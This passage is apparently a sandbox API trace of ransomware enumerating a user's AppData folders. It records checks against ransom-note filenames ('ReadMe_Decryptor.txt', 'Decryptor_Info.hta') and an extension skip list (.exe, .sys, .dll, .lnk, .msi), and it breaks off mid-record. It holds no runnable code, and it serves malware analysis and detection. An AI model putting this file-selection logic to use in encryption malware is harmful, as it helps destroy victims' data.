RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x76c588 [0080.789] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.789] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2ccecd00, ftCreationTime.dwHighDateTime=0x1d5d927, ftLastAccessTime.dwLowDateTime=0x7eae5060, ftLastAccessTime.dwHighDateTime=0x1d5e7a9, ftLastWriteTime.dwLowDateTime=0x7eae5060, ftLastWriteTime.dwHighDateTime=0x1d5e7a9, nFileSizeHigh=0x0, nFileSizeLow=0x6c35, dwReserved0=0x0, dwReserved1=0x0, cFileName="fYBJOahURakxC3vfUFg.swf", cAlternateFileName="FYBJOA~1.SWF")) returned 1 [0080.789] lstrcmpW (lpString1="fYBJOahURakxC3vfUFg.swf", lpString2=".") returned 1 [0080.789] lstrcmpW (lpString1="fYBJOahURakxC3vfUFg.swf", lpString2="..") returned 1 [0080.789] lstrcmpiW (lpString1="fYBJOahURakxC3vfUFg.swf", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.789] lstrcmpiW (lpString1="fYBJOahURakxC3vfUFg.swf", lpString2="Decryptor_Info.hta") returned 1 [0080.789] PathFindExtensionW (pszPath="fYBJOahURakxC3vfUFg.swf") returned=".swf" [0080.789] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0080.789] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0080.789] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0080.789] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0080.789] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0080.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0080.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x76c620 [0080.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.790] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0080.790] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0080.790] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0080.790] lstrlenW (lpString="Identities") returned 10 [0080.790] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Identities" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities" [0080.790] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\" [0080.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned 57 [0080.790] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.794] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.794] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.984] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.984] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.984] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0080.984] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0080.984] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0080.984] lstrlenW (lpString="{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 38 [0080.984] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpString2="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0080.984] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0080.984] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 96 [0080.984] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0080.985] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.985] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.988] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.988] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.989] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.989] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0080.989] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0080.990] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0080.990] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xccff46d0, ftCreationTime.dwHighDateTime=0x1d5e0d7, ftLastAccessTime.dwLowDateTime=0xc14fce00, ftLastAccessTime.dwHighDateTime=0x1d5df78, ftLastWriteTime.dwLowDateTime=0xc14fce00, ftLastWriteTime.dwHighDateTime=0x1d5df78, nFileSizeHigh=0x0, nFileSizeLow=0x54a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFswZvJ4Guw8UXBBx.jpg", cAlternateFileName="JFSWZV~1.JPG")) returned 1 [0080.990] lstrcmpW (lpString1="JFswZvJ4Guw8UXBBx.jpg", lpString2=".") returned 1 [0080.990] lstrcmpW (lpString1="JFswZvJ4Guw8UXBBx.jpg", lpString2="..") returned 1 [0080.990] lstrcmpiW (lpString1="JFswZvJ4Guw8UXBBx.jpg", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.991] lstrcmpiW (lpString1="JFswZvJ4Guw8UXBBx.jpg", lpString2="Decryptor_Info.hta") returned 1 [0080.991] PathFindExtensionW (pszPath="JFswZvJ4Guw8UXBBx.jpg") returned=".jpg" [0080.991] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0080.991] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0080.991] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0080.991] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0080.991] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0080.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0080.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x76c6b8 [0080.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.991] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x672fbb40, ftCreationTime.dwHighDateTime=0x1d5e029, ftLastAccessTime.dwLowDateTime=0xa6d41390, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0xa6d41390, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x17720, dwReserved0=0x0, dwReserved1=0x0, cFileName="JY1dPkaR.mp4", cAlternateFileName="")) returned 1 [0080.991] lstrcmpW (lpString1="JY1dPkaR.mp4", lpString2=".") returned 1 [0080.991] lstrcmpW (lpString1="JY1dPkaR.mp4", lpString2="..") returned 1 [0080.991] lstrcmpiW (lpString1="JY1dPkaR.mp4", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.991] lstrcmpiW (lpString1="JY1dPkaR.mp4", lpString2="Decryptor_Info.hta") returned 1 [0080.991] PathFindExtensionW (pszPath="JY1dPkaR.mp4") returned=".mp4" [0080.992] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0080.992] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0080.992] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0080.992] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0080.992] lstrcmpiW (lpString1=".mp4", lpString2=".msi") returned -1 [0080.992] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.992] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.992] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.992] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x76c750 [0080.992] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.992] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x19265320, ftCreationTime.dwHighDateTime=0x1d5e711, ftLastAccessTime.dwLowDateTime=0x33a13900, ftLastAccessTime.dwHighDateTime=0x1d5e143, ftLastWriteTime.dwLowDateTime=0x33a13900, ftLastWriteTime.dwHighDateTime=0x1d5e143, nFileSizeHigh=0x0, nFileSizeLow=0xc21a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LsgsrpB.mp3", cAlternateFileName="")) returned 1 [0080.992] lstrcmpW (lpString1="LsgsrpB.mp3", lpString2=".") returned 1 [0080.992] lstrcmpW (lpString1="LsgsrpB.mp3", lpString2="..") returned 1 [0080.992] lstrcmpiW (lpString1="LsgsrpB.mp3", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.992] lstrcmpiW (lpString1="LsgsrpB.mp3", lpString2="Decryptor_Info.hta") returned 1 [0080.992] PathFindExtensionW (pszPath="LsgsrpB.mp3") returned=".mp3" [0080.992] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0080.992] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0080.993] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0080.993] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0080.993] lstrcmpiW (lpString1=".mp3", lpString2=".msi") returned -1 [0080.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x76c7d8 [0080.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.993] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50fd8500, ftCreationTime.dwHighDateTime=0x1d5e038, ftLastAccessTime.dwLowDateTime=0x67033b90, ftLastAccessTime.dwHighDateTime=0x1d5e751, ftLastWriteTime.dwLowDateTime=0x67033b90, ftLastWriteTime.dwHighDateTime=0x1d5e751, nFileSizeHigh=0x0, nFileSizeLow=0x8235, dwReserved0=0x0, dwReserved1=0x0, cFileName="LYE6oZz iVeG5QNBY.gif", cAlternateFileName="LYE6OZ~1.GIF")) returned 1 [0080.993] lstrcmpW (lpString1="LYE6oZz iVeG5QNBY.gif", lpString2=".") returned 1 [0080.993] lstrcmpW (lpString1="LYE6oZz iVeG5QNBY.gif", lpString2="..") returned 1 [0080.993] lstrcmpiW (lpString1="LYE6oZz iVeG5QNBY.gif", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.993] lstrcmpiW (lpString1="LYE6oZz iVeG5QNBY.gif", lpString2="Decryptor_Info.hta") returned 1 [0080.993] PathFindExtensionW (pszPath="LYE6oZz iVeG5QNBY.gif") returned=".gif" [0080.993] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0080.993] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0080.993] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0080.994] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0080.994] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0080.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0080.994] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x76c860 [0080.994] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.994] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdadc30d0, ftCreationTime.dwHighDateTime=0x1d5de6e, ftLastAccessTime.dwLowDateTime=0x8494b170, ftLastAccessTime.dwHighDateTime=0x1d5e40e, ftLastWriteTime.dwLowDateTime=0x8494b170, ftLastWriteTime.dwHighDateTime=0x1d5e40e, nFileSizeHigh=0x0, nFileSizeLow=0x838c, dwReserved0=0x0, dwReserved1=0x0, cFileName="l_BCBt53g.gif", cAlternateFileName="L_BCBT~1.GIF")) returned 1 [0080.994] lstrcmpW (lpString1="l_BCBt53g.gif", lpString2=".") returned 1 [0080.994] lstrcmpW (lpString1="l_BCBt53g.gif", lpString2="..") returned 1 [0080.994] lstrcmpiW (lpString1="l_BCBt53g.gif", lpString2="ReadMe_Decryptor.txt") returned -1 [0080.994] lstrcmpiW (lpString1="l_BCBt53g.gif", lpString2="Decryptor_Info.hta") returned 1 [0080.994] PathFindExtensionW (pszPath="l_BCBt53g.gif") returned=".gif" [0080.994] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0080.994] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0080.994] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0080.994] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0080.994] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0080.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x708d18 [0080.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x72a920 [0080.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0080.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x76c8f8 [0080.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0080.995] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6b695060, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6b695060, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0080.995] lstrcmpW (lpString1="Macromedia", lpString2=".") returned 1 [0080.995] lstrcmpW (lpString1="Macromedia", lpString2="..") returned 1 [0080.995] lstrlenW (lpString="Macromedia") returned 10 [0080.995] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Macromedia" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia" [0080.995] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\" [0080.995] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned 57 [0080.995] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0080.999] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.999] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6b695060, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6b695060, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.001] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.001] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.001] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0081.001] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0081.001] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0081.001] lstrlenW (lpString="Flash Player") returned 12 [0081.001] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpString2="Flash Player" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player" [0081.001] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\" [0081.001] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 70 [0081.001] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.002] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.002] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.005] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.005] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.005] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="#SharedObjects", cAlternateFileName="#SHARE~1")) returned 1 [0081.005] lstrcmpW (lpString1="#SharedObjects", lpString2=".") returned -1 [0081.005] lstrcmpW (lpString1="#SharedObjects", lpString2="..") returned -1 [0081.005] lstrlenW (lpString="#SharedObjects") returned 14 [0081.005] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="#SharedObjects" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0081.005] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" [0081.005] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 85 [0081.005] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0081.007] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.007] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.008] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.008] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.008] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1d4582b0, 